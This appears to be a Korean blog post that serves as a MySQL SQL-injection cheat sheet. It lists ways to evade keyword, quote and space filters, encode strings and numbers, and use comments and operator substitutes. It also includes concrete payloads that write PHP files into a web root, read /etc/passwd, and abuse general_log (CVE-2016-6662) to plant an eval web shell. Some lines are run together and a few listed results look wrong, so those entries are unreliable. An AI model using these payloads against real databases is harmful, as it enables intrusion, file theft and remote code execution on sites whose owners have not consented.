티스토리 뷰
반응형
1. 특정 값을 비교해야 하는 상황에서 사용할만한 것들
select 'admin'='admin'; # Trueselect 'admin'<=>'admin'; # True (NULL도 비교할 수 있다.)
select 'admin'!='admin'; # False
select 'admin'<>'admin'; # False
select 'admin'<'admin'; # False
select 'admin'<'bdmin'; # True
select 'admin' in ('admin'); # True
select 'admin' in (select 'admin'); # True
select 'admin' not in ('admin'); # False
select 'admin' not in ('amine'); # True
select 'admin' between 'a' and 'z'; # True
select 'admin' between 'b' and 'z'; # False
select 'admin' between 'ac' and 'zz'; # True
select 'admin' between 'ad' and 'zz'; # True
select 'admin' between 'ae' and 'zz'; # False
select 'admin' regexp 'adm.*'; # True
select 'admin' like 'adm%'; # True
select 'admin' like 'ad_in'; # True
select 'admin' sounds like 'admni'; # True
select 'admin' sounds like 'aemin'; # False
select strcmp('admin', 'admin'); # 0
select strcmp('admie', 'admin'); # -1
select find_in_set('admin', 'admin') # 1
select find_in_set('admin', 'admie') # 0
select field('admin', 'admin') # 1
select field('admin', 'admie') # 0
select 1 is TRUE; # True
select 0 is FALSE; # True
select 'admin'='admin' is TRUE; # True
select 'admin' is TRUE; # False
select 'ladmin' is TRUE; # True
select 'admin'='admin '; # True
select 'Admin'='admin'; # True
select binary 'Admin'='admin'; # False
select binary 'admin'='admin '; # False
select instr('admin', 'a'); # 1 (index 반환 - 앞에서부터)
select instr('admin', 'c'); # 0 (결과가 없을시 0 반환)
2. substr와 같이 문자열에서 Index의 문자를 검사하는 것들
select substr('admin', 1, 1)='a'; # Trueselect substr('admin' from 1 for 3); # 'adm'
select substr('admin' from 1 for 1)='a'; # True
select substring('admin', 1, 1)='a'; # True
select substring('admin' from 1 for 3); # 'adm'
select substring('admin' from 1 for 1)='a'; # True
select mid('admin', 1, 1)='a'; # True
select mid('admin' from 1 for 1); # 'a'
select mid('admin' from 1 for 2); # 'd'
select mid('admin' from 1 for 1)='a'; # True
select left('admin', 1)='a'; # True
select left('admin', 3)='adm'; # True
select right('admin', 1)='n'; # True
select right('admin', 3)='min'; # True
select right(left('admin', 1), 1)='a'; # True
select right(left('admin', 2), 1)='d'; # True
select lpad('admin', 1, 1)='a'; # True
select lpad('admin', 2, 1)='ad'; # True
select rpad('admin', 1, 1)='a'; # True
select rpad('admin', 2, 1)='ad'; # True
select insert(insert('admin', 1, 0, ''), 2, 256, '')='a'; # True
select insert(insert('admin', 1, 1, ''), 2, 256, '')='d'; # True
select instr('admin', 'a'); # 1
select instr('admin', 'd'); # 2
select instr('admin', 'dm'); # 2
select instr('admin', 'c'); # 0
select position('a' in 'admin'); # 1
select position('dm' in 'admin'); # 2
select position('c' in 'admin'); # 0
select locate('a', 'admin'); # 1
select locate('dm', 'admin'); # 2
select locate('c', 'admin'); # 0
3. 문자열에 대한 필터링이 되어 있는 경우 대신할 것들
select 'admin'; # adminselect 'adm' 'in'; # admin
select 'adm''in'; # adm\'in
select 0x61646d696e; # admin
select 0b0110000101100100011011010110100101101110; # admin
select concat(char(97), 'dmin'); # admin
select unhex(unhex(36313634366436393665)); # admin
select mid(encrypt(ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi()*pi())*floor(pi())+ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi())+ceil(pi()*pi())*ceil(pi()*pi())*floor(pi()*pi())+ceil(pi()*pi())*(floor(pi()*pi())-true),mid(password(true+true),floor(pi()*pi()*floor(pi()))+true+true,true+true)),true, (ceil(pi())+true)); # ADmiN
select {hex`unhex`('61646d696e')}; # abc (이상하게 알파벳이 안들어간다..)
select /*!50000+0x61646d696e*/;
select concat(unhex(61), unhex(64), unhex('6d'), unhex(69), unhex('6e')); # admin
select concat(conv(10, 10, 36), conv(13, 10, 36), conv(22, 10, 36), conv(18, 10, 36), conv(23, 10, 36)); # admin
select char(97, 100, 109, 105, 110); # admin
select x'61646d696e'; # admin
4. 숫자를 나타낼 때 사용하는 것들
# 0
select false;
select !pi();
# 1
select true;
select !!pi();
select ceil(cos(true));
# 2
select true + true;
select ceil(tan(true));
# 3
select floor(pi());
select ceil(pi()-true);
# 4
select ceil(pi());
# 5
select floor(version());
select ceil(pi())+true;
# 6
select ceil(version());
# 7
select ceil(pi() * 2);
# 8
select floor(pi() + version());
# 9
select floor(pi() * pi());
# 10
select concat(true, false);
# 31
select hex(hex(true));# 활용
select concat(unhex(concat(ceil(version()), true)), unhex(concat(ceil(version()), ceil(pi()))), unhex(concat(ceil(version()), 'd')), unhex(concat(ceil(version()), floor(pi()*pi()))), unhex(concat(ceil(version()), 'e'))); # admin
5. 파일 input, output에 관련된 쿼리문들
select @@secure_file_priv;
select '<?php phpinfo(); ?>' into outfile '/var/www/html/ch4njun.php';
select '<?php phpinfo(); ?>' into dumpfile '/var/www/html/ch4njun.php';
select load_file('/etc/passwd');
# CVE-2016-6662
set global general_log_file = '/var/www/html/ch4njun.php';
set global general_log = on;
select '<?php eval($_GET[0]); ?>';
6. Union와 같이 내가 원하는 결과를 같이 볼 수 있는 것들
# Column이 새로 추가되면서 보이는 것
select /*!40000 version(),*/1; # MySQL Version >= 4.0
select /*!50000 version(),*/1; # MySQL Version >= 5.0
# Row가 새로 추가되면서 보이는 것
select 1/*!union select version()*/;
/*!select 1 union select version()*/;
7. 스페이스바(\x20)가 필터링 되어있을 때 사용할만한 것들
\x20\x09
\x0a
\x0b
\x0c
\x0d
\xa0
/**/
( ) 를 사용하는 방법 : select(*)from(table_name);
8. 주석으로 사용할 수 있는 것들
/* ch4njun */
# ch4njun
-- - ch4njun
%00 ch4njun (PHP 기준 ; 뒤에 %00가 들어가야한다. - 되는꼴을...)
# users에게 별칭을 붙여주는 형태가 된다. (신기방기)
select * from users `where 1`
9. 논리연산자(AND, OR)로 사용할 수 있는 것들
and
&&
%26%26
or
||
%7c%7c
10. Type 변환에 사용할 수 있는 것들
select '1'+1; # 2
select 'a'+0; # True = 1
select '1admin'=1; # True
select 'admin'=1; # False
select '123'=123; # True
select concat(2, 'test'); # '2Test'
select true + true; # 2
select`version`()+0; # 5.1
select cast(38.8 as char); # '38.8'
select convert(38.8, char); # '38.8'
select convert('admin', int); # 0
select ascii('a'); # 97
select ord('a'); # 97
select hex('a'); # 61
select char(97); # 'a'
select unhex('61'); # 'a' (알파벳이 들어갈 경우 홑따옴표 필수)
select bin(ord('a')); # 1100001
select bin(97); # 1100001반응형
'Web > Cheat Sheet' 카테고리의 다른 글
| [Cheat Sheet] XSS Cheat Sheet (0) | 2020.09.17 |
|---|